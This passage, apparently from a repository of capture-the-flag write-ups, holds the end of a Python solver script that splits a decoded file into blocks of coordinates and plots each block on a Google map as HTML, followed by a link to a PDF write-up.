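        plotter does not have to deal with empty rows. The redundant
        ``close()`` calls inside the ``with`` blocks and the dead ``start``
        flag of the original (it was always 1) are gone; the Python 2 print
        statement is now a call so the module parses on Python 3.
    """
    if path is None:
        path = args.file  # module-level argparse result, as in the original
    block = []
    count = 0
    with open(path, 'r') as fo:
        for raw in fo:
            line = raw.rstrip('\n')
            if line == marker:
                count += 1
                # An empty block still produces a (empty) file so numbering stays contiguous.
                with open(str(count) + 'bloc.txt', 'w') as opf:
                    opf.write('\n'.join(block))
                block = []
            elif line.strip():
                block.append(line)
    print('Separacio completa, fitxers totals: ', count)
    return count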
46 |
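def pintar_fitxer_coordenades(nom_fitxer, centre=(26.9009488, -43.857073717), zoom=3,
                              color='cornflowerblue', edge_width=10):
    """Plot the ``lat, lon`` points of one block file on a Google map and save it as HTML.

    Args:
        nom_fitxer: CSV file with one ``lat, lon`` pair per line (a
            ``<n>bloc.txt`` produced by ``separar``).
        centre: ``(lat, lon)`` the map is centred on; the default is the
            position the original hard-coded.
        zoom: Initial map zoom level (original default: 3).
        color: Polyline colour handed to gmplot.
        edge_width: Polyline width handed to gmplot.

    Side effects:
        Writes ``<nom_fitxer>.bloc.html`` next to the input file via
        ``gmplot.GoogleMapPlotter.draw``.

    Raises:
        ValueError: if a non-empty row does not contain exactly two numeric
            fields.
    """
    with open(nom_fitxer) as csvfile:
        # Skip empty rows (blank lines) instead of failing on the 2-tuple unpack.
        rows = (row for row in csv.reader(csvfile, delimiter=',') if row)
        punts = [(float(lat), float(lon)) for lat, lon in rows]

    if not punts:
        # zip(*[]) would raise on the unpack below; an empty block file is
        # possible when two markers are adjacent, so report and skip it.
        print('Fitxer buit, no es genera mapa: ' + nom_fitxer)
        return

    # Map position and zoom.
    gmap = gmplot.GoogleMapPlotter(centre[0], centre[1], zoom)

    lats, lons = zip(*punts)
    gmap.plot(lats, lons, color, edge_width=edge_width)

    gmap.draw(nom_fitxer + '.bloc.html')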
62 |
# Script entry: print the banner, parse -f/--file, split the input into
# block files and render one HTML map per block.
banner()
parser = argparse.ArgumentParser(description='solve_final.py')
requiredNamed = parser.add_argument_group('required named arguments')
requiredNamed.add_argument('-f', '--file', help='File to decode', required=True)
args = parser.parse_args()

num_fitxers = separar()
# range(1, n) stops before block file n, exactly like the original
# `while num_fitxer < num_fitxers` loop.
# NOTE(review): this means the last block file is never plotted — confirm
# whether that is intended.
for num_fitxer in range(1, num_fitxers):
    pintar_fitxer_coordenades(str(num_fitxer) + 'bloc.txt')

print("Programa acabat: Els fitxers resultants (.html) es troben al directori del programa")
--------------------------------------------------------------------------------
/writeups/universomarvel/episodio3/julianjm/julianjm-episodio3.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/universomarvel/episodio3/julianjm/julianjm-episodio3.pdf
--------------------------------------------------------------------------------